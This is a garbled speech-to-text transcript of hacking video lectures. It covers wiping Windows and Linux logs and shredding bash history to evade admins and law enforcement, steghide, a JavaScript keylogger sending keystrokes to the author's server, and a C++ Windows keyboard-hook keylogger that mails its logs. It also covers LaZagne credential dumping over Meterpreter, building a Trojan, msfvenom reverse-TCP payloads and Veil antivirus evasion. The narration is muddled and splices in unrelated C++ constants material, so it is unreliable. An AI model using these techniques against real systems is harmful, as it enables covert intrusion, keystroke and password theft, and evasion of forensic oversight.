your desktop interpreter, you can have like get PID, key, local, all, you can do all of those right in here. So that's all about this payload. So that's it, how it works. So it may have some problem, as you saw first time. So after that you can simply use payload to get your Metapreter session in here on your Kali Linux machine. Hello everyone. So in this lecture we'll be talking about how we can hide our tools from our victim machine and cover our tracks and leave no trace behind on the target system. So I'll show you a few ways that we can cover our tracks, making it very difficult for a system admin or forensic investigator or law enforcement agent to track our malicious activities. So log files are most common techniques for a system admin to determine what has taken place on their system. Every unsuccessful login, successful login and security event is logged into a log files. So the first thing we need to do is make certain that there is no trace of our malicious activities in this log files. So in newer version of Metaexploit Metapreter, there is a still script called clearrev to clear all event logs, and the program will go into the event logs on a Windows system and clear out all of the logs, and this might looks like a little suspicious to our so it will look suspicious to the vigilant system admin, and most system admin are not vigilant. So at the very least it will remove our connection and or attempt connection from the log files, and of course there may be other evidence left behind such as router logs and ITS logs, and we will deal with this feature. So first, Metaexploit to compromise the system and create a Metapreter command prompt. So once we Metapreter session, we simply type just clear rev. As we can see in this screenshot, all of the event logs of the application system and security have been cleared from the log files on the victim machine. Then you can see all has been cleared in here. Then after that, clearing an event logs on Windows machine. So another way to clear on the log files on Windows system is to use clearlogs.exe. You can download from Google. So if we have a physical access to the system, we can simply install it and then run the clear logs, and we can choose to clear the security application and security logs. So to clear the security logs, type clearlogs.exe minus sec, which is security. Then we can go and event viewer and click on the security event. Then we can see that all of the security events have been cleared and there is no trace that we had been in here. So if we have a remote access to the system, we can simply upload it to the system with TFTP and then run on the system. And also one thing to note, that don't forget to remove the clearlogs.exe before leaving the system, as the mere presence of the clearlogs file will be tellable evidence that someone has compromised their system. In Linux system, log files are stored in var/log directory. So we can open and view the plain text containing the log message by opening with any text editor. So before we leave any compromised system, we will want to open this file in our favorite text editor and simply just delete all of those entries, or if we have time, just carefully go through and delete all the any entries related to specifically on our compromise of the system. Then finally, what we need to do is, before we leave the compromised Linux system, we want to make certain that our command history is erased. Remember the bash shell we are trying, and we will save around 500 command. So a system admin could track all of our command and detect our activities on the system and potentially use them as evidence. So just simply just type this command echo. So the size of our history file is determined by our environment variable, which is this hist size. So we can check the size of a hist size by typing this echo hist size. Then we can then set it as 0 by typing 0 is equal to 0. Now our shell is not store any of our history. So if you remember, change it to 0 before beginning of the hacking, and none of your command will be stored in your terminal. So if you have already written some command, remember to log out and log back and clear your history after the hist size is 0. Then sometimes we won't have enough time to erase the history file or change the hist size variable. So in a hurry, we can actually shred our history file by typing this bash history, and this shred command, this is the shred command with -zu, this one switches will override the history with zeros and it will delete all the files. So that's how we use to clear event logs and all of those. And to check to see if your history has been shaded, you can just simply view the history file by typing the bash history, and it will show you all of those history and logs. So that's how you use event logs on clear all of those by hiding or after using your attacking machine, or after targeting your attacking machine and done with your attacking. So hello everyone, in this lecture we're going to be talking about steganography. So what is steganography? So steganography is a practice of concealing a file, message, image or video within another file or message, image or video. Generally, the hidden message appear to be a part of like something else like image, article or shopping list or something else that cover the text. So how to use this steganography? So there are two primary tools available in Kali Linux for steganography, which is first one that we'll be using is StegHide. So StegHide is a steganography program that is able to hide data in various kinds of images and audio files. So let's StegHide is not pre-installed in Kali Linux, so you have to install StegHide. So just type apt.install steg. As you can see, I already have installed StegHide, so as you can see it's not reinstalled again. So let's go to StegHide. Help option to see all of those details. So as you can see, you can embed options like we'll be using EF, SF, all of those. So EF, so you can embed file like select file to be embedded in using this option. Then we can embed a file name using -EF. You can use cover the file using -CF and all of those using this StegHide. So let's go to our browser and download a picture. I already downloaded a picture for this testing purpose. So we see probably over 100 images a day or internet or in our phone or social media. But one little thing that each of you may not have known, that there is a behind image, there is some process between one person to another. There maybe have been text or another secret data. That data could be anything from a secret text message all the way to a virus hidden within the code of an image that you see on the internet daily basis. So in today's lecture I'm going to show you how you can possibly do it within a couple of minutes. So you already know, yeah, after you install stack height, let's just go to the directory where you download your picture. So let's go to my directory. So this is my directory. Let's list all of those files. As you can see, I have only one file in here. So now we are going to use this cat.jpg, and the next thing we need to do is now use this. So just use this command. I already typed, so just type cat, not this cat, cat is a command built in this Kali Linux that will type or text, and that will create a message file in here. So let's just type. As you can see, it created a file in here, name message. So let's type in here like this is cat. So that's it. Control C, press Control C to save this text in here. So now what you have to do now is you have to use this command. So stack height, you have to use this stack height and embed, and will be embed this text into this file or this image. So this text will be inside of this image. So what you have to do now is you have to just type stack height embed and you will use -cf. So what does -cf do? As you can see, it will select a cover file, which is this file, and with cover file our is this cat.jpg, as you can see, and then we will use -ef. So and we will select a file to be embedded. So as you can see, we will select this message file to be embedded in here. So it is not going to be seen by anybody unless I want to be seen, or unless they are really good and they have an idea what I was doing in the first place. But again, we will look at the image so many times that every day we would never even know that if we don't have a key phrases in here. So let's go and hide this in here. So let's just type enter, press enter, and it will give you to ask a passphrase. So this file cannot, or this text cannot be found with anybody unless you give them this passcode that you are gonna type in here right now. So we want our message name to be hidden file. So enter a passphrase. So I typed a passphrase in here and type the passphrase again. So if this match, as you can see, embedded message in cat.jpg is done. So and it's done. This text is embedded into this file. So the way it can be discovered is that if someone can break your passcode to get the message out. So yes, they may know something is off about it, but not how do we actually retrieve. So once we put in a passcode, they have to guess that. So they have to guess that passcode that I put. So if they guess that right, they can get the information like this is cat that we put in this message. So they can get this message if they put this password right. So they can retrieve this text, otherwise they cannot. So they have to guess that. So how can you extract that? So let's just extract. So to extract, simply just what you have to do now is just type stack height, extract, SF. So what SF will do, as you can see, we will select those SQL file and it will write a result to the file instead of this cover file. So now the fact that the cat.jpg has the file embedded into it, we can see here the embedded message in cat.jpg and it's done and it's completed. To extract, you have to just type this and you have to enter your passphrase again to extract. If you type it wrong, you cannot extract, so let's type it wrong. So I typed a wrong password, as you can see. Could not retrieve any data with that passphrase because I typed a wrong passphrase. So if you typed a current passphrase, then it will be extracted. So that's the way you can embed and extract a text into this JPG or any audio. Even you can add this into a audio file. So that's how this steganography works.
Hello everyone, hope you guys are well. So today I will talk about basic and advanced methods for clearing our logs and evidence. So in cybersecurity, clear web browsers, cache, cookies and history is really a important thing. Before you begin, clearing your web browser's cache, cookies, and history may remove data such as saved passwords, address bar, predictions, shopping cart contents, or many more. While you should clear your web browser's cache, cookies, and history periodically in order to prevent or resolve performance problems. You may wish to record some of your saved information first. If you are unable to do so, you have to need troubleshooting alternatives. For details about browser cache, cookies and history, see web cache, HTTP cookie, web browser history. For desktop browsers, to quickly open menus used to clear your cache, cookies and history, ensure that the browser is open and selected and press Ctrl Shift Delete Windows or Command Shift Delete Mac. If this doesn't work, follow the appropriate instruction. Like if the instructions below don't exactly match what you see, you may need to update your web browser to the latest version. So there are so many browser, Android, for iOS, for desktop. All the browser history, cookies, refreshing system all is same almost. So this is the attack approaches by the help of browser history. Attack approaches and target information. What a hacker get information about the victim, like personal information, account activity, browser history, browsing history. So attacker autocomplete history sniping, frame to target website, open target website in new window, and browsing history sniping. Exploiting same origin with browser history. Browser history attacks leaks sensitive information regarding different origins. A good attacker first clear browser history, delete cookies, delete downloads, clear password manager, and delete private data. Browser history attacks leak sensitive information regarding different origins. They allow you to determine what origins the user has been visiting. In a legacy browser, a browser history attack typically involved simply checking the color of links written to the page. You will briefly explore using CSS colors, but today's latest browsers have been patched, so you won't find this type of attack. This will describe attack methods that are currently the most effective for revealing browser history information across a range of browsers. A few examples of lesser known browsers vulnerable to these story stealing vulnerabilities like Avant and Maxstone browsers will also be explored. So how to clear cookies browser. Cookies are small text files passed in storage in your browser. Removing cookies on Windows, removing cookies on Mac. In addition to deleting cookies, you can also delete your cache, browser history, stored password, and other browser stores. If you can't find instruction here, you can usually search for help on browser's help tool. Also, you can usually find it by poking around. Most browsers keep their cookie settings in one of few places: historic, preferences, settings, privacy. In addition to regular cookies, you may also have flash cookies or add up local storage objects. You usually can't delete these from the browser because they aren't handled by the browser, they are handled by the Adobe Flash Player. So removing cookies on Windows and deleting cookies from Google Chrome on Windows. Just simple thing. Every browser and every operating system. Removing cookies on Mac, deleting cookies in Firefox on Mac, deleting cookies in Safari on Mac, deleting cookies. So this is the removing cached cookies for all the operating system, and this is the simple procedure. A new attacks arrival. The attacks the researchers developed in the form of JavaScript code cause web browsers to behave differently based on whether a website had been visited or not. The code can observe these differences, for example, the time an operation takes to execute or the way a certain graphic element is handled. It collects the computer's browser history. To design the attacks, researchers exploited features that allow programming to customize the app exploited features that allow programmers to customize the app appearance of their web page, controlling fonts, colors, backgrounds, and so forth using cascading style sheets CSS, as well as a cachement to improve to performance of a web code. The researchers for attacks target flaws in relatively new browser features. For example, one attack takes advantage of a feature added to Chrome in 2017, dubbed the CSS Paint API, which lets web pages provide custom code for drawing parts of their visual appearance. Using this feature, the attack measures when Chrome re-renders a picture linked to a particular target website URL in a way invisible to the user. When a re-render is detected, it indicates that the user has previously visited the target URL. This attack would let an attacker check around 6,000 URLs a second and develop a profile of a user's browsing habits at an alarming rate, said Fraser Brown, a PhD student at Stanford who worked closely with Smith. Though Google immediately patched his flaw, the most egregious of the attackers that the researchers developed, the computer scientists describe three other attacks in their WOOT 2018 that put together work not only on Chrome but Firefox, Edge, Internet Explorer, but on Brave as well. The Tor browser is the only browser known to be totally immune to all the attacks, as it intentionally avoids storing any information about a user's browsing history. As new browsers add new features, these kinds of attacks on privacy are bound to resurface. Browser attacks are very common and are likely to succeed against systems that have not been hardened against them specifically. Some of the more commonly used browsers such as Microsoft Internet Explorer and Mozilla Firefox now include at least a protection against such attacks. Browser security plugins such as NoScript for Firefox and Guardant ID2 for Internet Explorer can also help to foil such attacks. Unfortunately, the most commonly used operating systems have only a very minimal implementation of capability-based security, and this does not often extend to sharing of permissions between applications. In most cases, in order to mitigate the attacks that we discussed, additional layer of security in the form of applications or plugins are needed. So that's it, guys. Hope you guys liked it, and thanks for watching. Hey there. So what is a keylogger? How attackers can monitor everything you type? Keystroke logging software is one of the oldest forms of malware dating back to typewriters. It's still popular and open source, and often used as part of larger cyber attacks. Keylogger definition. Keyloggers are a type of monitoring software designed to record keystroke made by user, one of the oldest forms of a cyber threat. These keystroke loggers record the information you type into a website or application and send to back to a third party. Criminals use keyloggers to steal personal or financial information such as banking details, which they can then sell or use for profit. However, they also have legitimate uses within businesses to troubleshoot to improve user experience. For monitor employees, law enforcement and intelligence agencies also use keylogging for surveillance purposes. How do keyloggers work? Keyloggers collect information and send it back to a third party, whether that is criminal, law enforcement, or IT department. Keyloggers are software programs that leverage algorithms that monitor keyboard strokes through pattern recognition and other techniques. Explains Tom Brain, Vice President Security Strategy at Morphic. The amount of information collected by keylogger software can vary. The most basic forms may only collect the information typed into a single website or application. More sophisticated ones may record everything you type to matter the application, including information you copy and paste. Some variants of keyloggers, especially those targeting mobile devices, go further and record information such as calls, both call story and the audio information from messaging applications, so GPS location, screen grabs, and even microphone and camera capture. Keyloggers can hardware or software based. Hardware based ones can simply display between the keyboard connector and the computer's port. Software based ones can be whole applications or tools knowingly used for downloaded or malware unknowingly infecting a device. Data captured by keyloggers can be sent back to attackers by email or uploading log data to predefined websites, databases, or FTP servers. If the keyloggers comes bundled within a large attack, actors might simply remotely log into a machine to download keystroke data. And how hackers use keyloggers. The first keyloggers were used by the Soviet Union in the back to 1970. Long time ago, long history. To monitor IBM electric typewriters used embassies based in Moscow. Today, spyware such as keystroke loggers are common part of the cybercriminal toolkit to capture financial information such as banking and credit. Keylogging in the workplace. There is also a large but ethical questionable market for spyware. Legal keylogging apps being used by people to spy on their family, friends, or partners. Sometimes called corporate keylogging, such monitoring software can be useful in testing, debugging, and user experience in an above-board corporate environment. Keyloggers are also used for that purpose. How keyloggers infect devices? Keyloggers can be placed on machines in a number of different ways. Physical loggers require a person to be physically present to be placed on a machine, meaning such attacks are harder but not impossible to achieve and more likely to come from an insider threat, while as keyboards can also be supported on remotely. Last year, hundreds of models of HP laptops are shipped with keylogging code present in its patchpad drivers. The logging was disabled by default and was part of debug tool left in the by one of the company's suppliers. Software-based keyloggers are far more common and have multiple routes for entry. So this is the basic keylogging and keyloggers details user. How to make a keylogger in JavaScript keylogger tutorial. In this tutorial I'm going to teach you how to make a keylogger in JavaScript. Actually it is very easy to create a JavaScript keylogger which will record every keystrokes of the user on the website. Just look at this index.html file for testing purpose only. Look at this code. You guys need this code and keylogger.js file. You have to replace URL with your domain name, that's it, and you don't need to change anything. Look at this code carefully. And then one make keylogger.php file, and php file will store the keystrokes in data.txt file. Make sure you have created an empty data.txt file in your server. Once the user types on the website, then every keystrokes will send. Just look at this code and try by your own. So let's make a keylogger. In first open a Visual Studio. Look like this. I take a file in all files. Keylogger.php, need a PHP file. Here is my index.html as I shown you guys before. I just copy this code and paste here. This is my JavaScript code. I use post get and also a PHP file. This is my keylogger. So now I open FileZilla. It is an open source software distributed free of charge under the terms of the GNU General Public License. And by the help of FileZilla, fixed vulnerabilities like the installer doesn't rely on the path environment variable to find the tools it's needed, but refers to them absolutely to avoid hijacking. So if I go to login form, give username and password and type login button. One more thing, FileZilla is a free and open source cross-platform FTP application consisting of FileZilla client and FileZilla server. Clients are available for Windows, Linux and Mac OS. Servers are available for Windows only. Both server and client support FTP and FTPS. Whenever constant keyword is attached with any method, variable, pointer variable and with the object of a class, it prevents that specific object, method, variable to modify its data items value. And constant variables, there are certain set of rules for the declaration and initialization of a constant variables. Like the constant variable cannot be left uninitialized at the time of the assignment. The constant variable cannot be uninitialized at the time of the assignment. It cannot be assigned value anywhere in the program, and explicit value needed to be provided to the constant variable at the time of declaration of the constant variable. A program I am working on has many constants that apply throughout all classes. I want to make one header file constants.h and be able to declare all the relevant constants, and this is my other classes. Take include constants.h. This works because in C++ a namespace scope that is explicitly declared const and not explicitly declared externs has internal linkage, so these variables would not cause duplicate symbols when you link together translation units. And alternatively, you could explicitly declare the constants as static. Back to the code. Include hash if and def key constants underscore is whether the element is an int or a double, a function, a class, or some other thing. Furthermore, each name must be declared directly or indirectly in every .cpp file in which it is used. When you compile a program, each .cpp file is compiled independently into a compilation unit. The compiler has no knowledge of what names are declared in other compilation units. That means that if you define a class or function or global variable, you must provide a declaration of that thing in each additional .cpp file that uses it. Each declaration of that thing must be exactly identical in all files. A slight inconsistency will cause errors or unintended behavior when the linker attempts to merge all the compilation units into a single program. And in C or C++ program, we can define constants in two ways, like number one, using hash define preprocessor directive, and number two, using a constant keyword. The values assigned to each constant variables are referred to as the literals. Generally, both terms constants and literals are used interchangeably. For constant, int equal value is a constant expression and the value is referred to as constant integer literal. My class is key pair and data type is public. Key pair first bracket inside constant std string. Static std map greater than integer and key pair map less than integer and key pair greater than keys. Then the compiler will treat it as a separate variable in each translation unit. So if you link to such translation units together under the same object layer, you will get multiple definition error or something like already defined in. To solve this issue, mark this variable static const or as simply constant. in C++, where static is implied for constant variables. What this does is to make the linkage of this variable definition internal, meaning that once this definition gets hash include d into a .c or .cpp file, the definition stays there. It does not have scope outside of the translation unit and thus connect to be seen by the other object files. On the other hand, the addresses of each of these copies of the constant in different translation units will be different. To have a true global constant this way, you will need to have an external constant double in your header file, followed by constant double in a separate source file, which is compiled into a separate object, which then gets linked with all other objects. To use constant instead of hash define, you must be able to place constant definitions inside header files as you can with hash define. This way you place the definition for a constant in a single place and distribute its translation units by including the header file. A constant in C++ defaults to internal linkage. It is visible only within the file where it is defined and cannot be seen a link time. I gather here many keys. Simply coding here, just type std and the value is this. I import it. Welcome back, guys. Welcome to C++ tutorial. In last video I work in constants and it's a file under its package in keylogger. So today I'll talk about key hook. Just check. So start coding hash if and def key b hook file name, define key b hook underscore race and hash define include key constants dot h, include timer dot h. This is all in this keylogger packages, so need to import them, all of this file. Hooks are one of the most powerful features of Windows also, and we can hooks to TRP all the events in the Windows environment also. This operating system, a hook is a mechanism by which a function can interrupt events, messages, mouse actions, keystrokes before they reach an application. Basically, function or something executed in between two functions or before one, and I've heard it's used before something such as machine functions or something to intercept messages sent between the user and machines. It is key hook. Back to the code. If keylog empty, it's a logic statement, and this is called if else statement. If keylog empty, then the value return last file In IO, write log key log, who is in this keylogger project, and if again last file empty, then execute keyboard hooks are definitely a Windows thing and not a C++ thing. You will get more help, a more appropriate forum of or news group. For one reason, these people are more likely to have examples and such that they can find more conveniently for this question. Specifically, I think we will get a better answer in another forum or news group. So give command, so back to the code, int x new int equal mail. The logic is mail, send mail, then log last file, and message is hi, and the file has been attached to this mail. And for testing, enjoy. Mail was not sent, error code plus helper, it execute to string, and application logger is a class that implements a logger that can be used by applications to save log file somewhere on the file system. Welcome back in keylogger project. Last tutorial I showed you how you guys can use key hook. The Windows API offers a tool known as hooks, which are defined in their documentation as a point in the system message handling mechanism where an application can install a subroutine to monitor the message traffic in the system and process certain types of messages before they reach the target window procedure. And in other words, hooks are a way to intercept system messages and react accordingly. The constants of the main function are quite simple. We only need to initialize a handle to a hook, using the set windows hook function, and the first argument indicates the kind of message we will be monitoring, and in this case y keyboard underscore ll means that we will be receiving low level. That's what it stands for, information from the keyboard activity. You will see all available types of hooks on the MSDN document. And the second argument, it is hook procedure, which is a user defined function defining what the hook will do. Typically a hook is associated to a particular process and DLL containing its procedure, and those are indicated by the
third and fourth arguments. For simplicity, we set both to null, meaning that the hook procedure is started by the same application and it will be associated with all threads running on the same desktop. And in the end, we call the unhook Windows hook X to get everything cleaned up. The most important part in an application like this is the definition of the hook procedure. As it's common on Windows API, this function can have any name as long it addressed to the appropriate function prototype. For instance, a procedure called keyboard proc should hook like this: L result callback keyboard proc int encode w pram w wprm wprm lprm iprm. The variable encode will contain a number smaller than 0 if there is no keyboard information currently available for HC action. Otherwise, if there is information, wparam will contain the type of message that was received, and lpram ipram will provide additional data. In this case, we are interested in the key down message. wparam equal wm key down, which triggers whenever users presses a key, and when the wm underscore key down message is received, iparam contains a pkbdll hook struct which stores, among other things, the virtual key code of the pressed key. And once we extract this data, we can do whatever we want with it, like the function dot, and we analyze the user's keyboard activity and display a console message when the sequence lab case insensitive is type. This is achieved using a standard FSM based lexical analyzer. For completeness, the documenting function will look something like this. I create alright, keylog plus equal keys, and keys inside kbs minus greater than vk code dot name, and if statement tails, if kbs minus vk code equal vk, return keylog plus equal slash n. One more thing, there are two types of hooks: thread specific hooks and system wide hooks. And a thread specific hook is associated with particular thread only, any thread owned by the calling process. And if you want to associate the hook with other process and threads, you will have to use a system wide hook. And there is a hook procedure associated with a hook. This procedure is always called when the particular event occurs. Welcome back. You can install several hooks at the same time as long as you follow the proper procedure. Windows hooks are designed to operate in a daisy chain fashion similar to subclassing. To install a hook, you call set windows hook with the type of hook and a pointer to your hook procedure. Set windows hook ex returns the handle to the old hook, and Windows calls your hook procedure whenever one of the hook events happens. When your procedure is done handling in the event, it's supposed to call the next hook by calling what else? Call next hook ex. Of course, there's no one forcing you to call next hook ex, but if you don't, your application is likely to break. In the case of computer-based training, CVT, hook MFC uses it to trap window creation. Windows calls the CVT hook with HCVT. Whenever it creates a window, MFC handles HCVT by subclassing the window and attaching it to its CWND object. And when Windows calls the CVT hook, it passes the HWND and WParam. But how does MFC know which CWND derived object to attach? By setting a global. To create a window, you must call CWND create or CWND create EX. And its boolean type expression either true or false. So mail timer dot start true, and if true, return give again expression bool uninstall hook when the need is closed. Simply give this expression bool uninstall hook bool b equal unhook windows hook ex ehook. And C++ itself does not have events or hooks, but a lot of C++ libraries and frameworks implement them. For an example of generic events library, cboost, signals, some of the implementations allow their events to be seen by the other applications.
Hey there, let's talk about Lasagne. Lasagne. So in LinkedIn, what is the description of the Lasagne? The Lasagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its password using different techniques, plain text, APIs, custom algorithms, databases, or many things. This tool has been developed for the purpose of finding these passwords for the most commonly used software. At this moment, it supports 22 programs on Microsoft Windows and 12 on a Linux Unix like OS. Uses first launch all modules cmd lasagne.exe. All this is for Windows procedure. So want to use I want to use this on my Linux machine. So guys, in this tutorial I'll show you guys how to git clone lasagna and command and use it on Kali machine. So first go to a website. Here I am opening my Mozilla. Open a new tab and just write lasagna git clone. So just click first website. So this is the actual address or a path for git cloning lasagna. Just copy this URL, open your Linux terminal, type cd desktop. What happened? Sorry for my mistake. Now type cd desktop slash enter. Now it's going to desktop. Now git clone. I already cloning this lasagna. What happened in my terminal? Why it errors? Now give address which I copied from GitHub. Now git clone start and finish because I already do that. Now give again, type cd. I want to create directory lasagna. And give command ls. Now this is the license for Linux, Mac and Windows operating system. So guys, this is the procedure actually how you guys can git cloning lasagna, and this is the basic command for this. And lasagna is a post exploitation open source tool used to recover stored passwords on a system. It has modules for Windows, Linux and Mac. The lasagna project is an open source password recovery tool. used to retrieve password stored on a local computer. Is CHOP software stores its password using different techniques like plaintext APIs, custom algorithms, databases, and so on. This tool has been developed for the purpose of finding these passwords for the most commonly used software. At this moment, it supports 22 programs on Microsoft Windows and 12 on Linux, Unix-like operating systems. Some antivirus will flag the Lasagna password recovery tool that is used by our saved credentials capture only on live scans from the collection key as being a potential low security risk. The tool is not a virus, but because it can recover passwords stored in protected areas, some antivirus will flag it. So I install here some of my command like pip install this command. Welcome back there. So now I'm using Meterpreter and Lasagna. So the Lasagna is an open source application. It retrieves stored passwords on a system. It directly injects the Python code in the memory without writing anything on disk. That makes it difficult to trace. Usually attacks target. Without a Lasagna, attackers normally run a bunch of different scripts to get the different applications. So open Kali Linux for achieve Meterpreter and upload Lasagna. Open Kali Linux terminal and type msf console in order to load Metasploit framework. Now need to compromise victim's machine. Want to achieve n type of session, either Meterpreter or shell, and to do so we can read our previous command. After creating Meterpreter on the remote system, we need to upload executable file to the target machine to execute credentials. We will use upload a command for this. Upload lasagna.exe and that have the Lasagna on the target system. It's time to enumerate passwords. Use shell command on the Meterpreter shell to get the command line on the target system. To get details about the Lasagna, we will use the -s parameter. This will print the list of parameters and arguments with the working examples of the screen. By the help of this, you guys can do mails argument. The argument targets mail clients like Mozilla, Thunderbird and Microsoft Outlook. When this argument is selected, a script runs in the background which extracts the login credentials that are stored by the Gmail clients, and the command is lasagna.exe mails and upload lasagna.exe file I told once. Now uploading my files in Meterpreter. You guys also doing Windows argument by this, and this argument target Windows security on all fronts. When this argument is selected, a script runs in the background which includes auto logon, catch dump, create man. Hello everyone, and let's talk about Trojan horse, how to create it. I show already, and how to use it in my Windows operating system. I make a Trojan horse, this, and client. So I give a basic about Trojan. A Trojan horse or Trojan is a type of malware that deceives itself as a legitimate application. It could be found hidden in an email attachment, games, software, movies or songs, or any kind of stuff. It is different from a computer virus in that a Trojan doesn't replicate itself and has to be installed by the user. Trojan's main objective is to try and disrupt, crash, or at times outright steals a user's data from their system, and it seems to be on the rise too. The Malwarebytes State of Malware 2020 report identifies Trojan as the second most occurring malware attack faced by businessmen just after adware. While there are thousands of different Trojans out there, a few popular and especially Developing Trojans including Dynabot, Lokibot, Trojan T9000 and remote access Trojans. So look at this procedure in Windows machine. And this is the server editor and configuration settings. I can take custom icon or use as null like no icon, and can make module. So successfully this is my server is built, and the file name is tor.exe. So look at this. So I need to open my jump htdocs and copy in a htdocs folder. Open my Apache jump controller. Although Trojans come in varying forms and threat severity, all of them are classified as such because they are more or less carry out at the same specific activities on PC, and these include things such as keeping track of the websites you visit, installing other malicious software on your PC such as a worm or virus, send crucial information like usernames and passwords to black hat hackers, creating backdoors, use PC to conduct DDoS attacks. While there's no sure shot why I recognize a Trojan without an antivirus program, a subtle giveaway is the gradual decline PC speed, which is hampered due to CPU resources being used by the Trojan. So I go again to my CMD and ipconfig command. Look guys, here are the option for trash. Welcome back. Let's talk about payload computing. So what is the payload computing? In computing, a payload is carrying capacity of a packet or other transmission data unit. The term has its roots in the military and is often associated with the capacity of executable malicious code to do damage. The term payload has two meanings, which refers malicious code used to exploit and compromise IT networks and systems. So data payload, the payload of a specific network packet or other protocol data unit PDU is the transmitted data sent by communicating endpoints, network protocols, and specify the maximum length allowed for packet payloads. The payload is then wrapped in a packet that contains information such as media, access control address, and IP information, quality of service tags. And malware payload in the context of malware refers to malicious code that causes harm to the targeted victim. Malware payloads can be distributed by methods such as worms and phishing emails. So here I use Android just to give command ms venom -p Android Metafrater reverse TCP and localhost root desktop So this is example of payloads. IP packet data payload. An IP packet consists of an Ethernet, IP and TCP header. This information helps the packet adhere to the communication protocol standard and reach its destination on the network. The payload portion of the packet contains the data that a user or device wants to send. And phishing malware payload. In this scenario, a phishing email contains a self-replicating virus stored within a macro of an Excel spreadsheet attachment. So guys, how does an IP packet payload work? Let's look at this code, look at this command. Sorry for mistake. Look at this command, and you have to know how does an IP packet payload work. An IP packet might contain a payload with commands issued by an end user, such as a request or web content, but more often it carries a payload consisting of data transmitted by a server in response to a user request. Payload limits on PDUs are usually specified by a protocol, and the maximum size of the payload for an individual PDU rarely changes. And network protocol payloads limits are important because they can affect protocol performance. For example, smaller payloads mean more packets must be created and transmitted for a volume of data. Larger payloads create fewer packets but require a fast and reliable network capable of delivering large volumes of data without delays caused by errors or transient network conditions. And the maximum size of network payloads is determined by subtracting the amount of data required for protocol headers and trailers. If the protocol uses them from the maximum transmission unit MTU size for the protocol, the MTU is for IP packets varies by system and network. The original IP standard specified that all hosts must be able to accept packets as large as 576 bytes with a data payload of 512 bytes and 64 bytes for the header. And this is the basic Android command. And how does a malware payload work? Attackers use a two-phase approach to bypass defenses, and this works by keeping the payload, which is the part that causes damage to the victim, separate from the infection vector. This way, proven distribution methods such as phishing emails and worms can be adapted over time for malicious payload delivery, while malware payloads do not have specified limits for a maximum carrying capacity. Malicious actors try to keep the malware payloads to a reasonable size to avoid being flagged by endpoint or network-based malware detection tools. Almost any type of malware can be incorporated into a payload with the help of a payload generator to create executable malware. Malicious actors as well as penetration testers use payloads generator to incorporate an executable piece of malware into a payload for delivery to the targets. The open source Metasploit project includes resources for researching security vulnerabilities, including payload generator also. And in Metasploit, hello everyone, welcome back. So what is the Veil framework? Because we just open Veil now and use it for bypass antivirus using Veil framework. So first I open my terminal and keep command sudo -s, and then I give command apt installed Veil in my Linux terminal in VirtualBox. So what is a Veil framework? Based on Python, the Veil framework is one of the most familiar devices for antivirus deception. You can perform many various Metasploit payloads in C, Python, Ruby, PowerShell and more. The advantage of this tool is that you can join up a layer of encryption to your payloads. With the right optimization, you can bypass some general AV solutions and Requirements to install the Veil framework: you are ready to configure the updated Python packages into your device. And the most important point to remember is that the installation must be enabled with super user privileges. If you are not using the root account prepared syntax with sudo or change to the root user before starting, the Veil framework is a feature tool for avoiding failure detection by the antivirus software. And you can also execute the below commands in GitHub by doing git clone. Bypassing antivirus solution is easy as well as difficult depending upon situation and methods you are using. Evading firewalls, intrusion detection systems, and antivirus solutions is often needed while performing penetration tests or in red team operations. You will see a lot of tutorials and articles of how to bypass antivirus using Veil evasion Metasploit framework or some payload generator and encoder tool, but unfortunately none of them actually work. Just check this video with the payloads you create to see what I mean. That's because antivirus solutions are improving their databases and their methods every day, and these tools are not. So now just paste this localhost and set in Metafrater, set local port 8080 generate a Veil evasion and default is payload, and need to a base name for output files. A new module was introduced to Metasploit framework, probably in Metasploit 5 release. The purpose of this module to evade particularly Windows Defender using the combination of different antivirus evasion techniques, as antiviruses update their databases and methods regularly, so this technique might not work every time in future, but let's try this. One of the common heartless ethical hackers and penetration testers are bypassing antivirus on target systems. Veil uses a Metasploit-like interface to create a remote shell program that will bypass most antivirus programs. a little social engineering is required to get the target to run the resultant shell program, but if they do, it will connect back to the Kali system and allow the attacker to have full remote access. So I show already Veil terminal use. So starting Veil, just give command Veil enter, use for using Veil evasion, type list and then press enter for failures available list, type use 22 and hit enter. You guys can type set host and enter, then set L host, and one command is generate. Veil will now generate the shell code with the options that we choose. Now we need to give our created file a file name or base name. I choose any of them. So this is it guys. Hope you guys liked it and thanks for watching.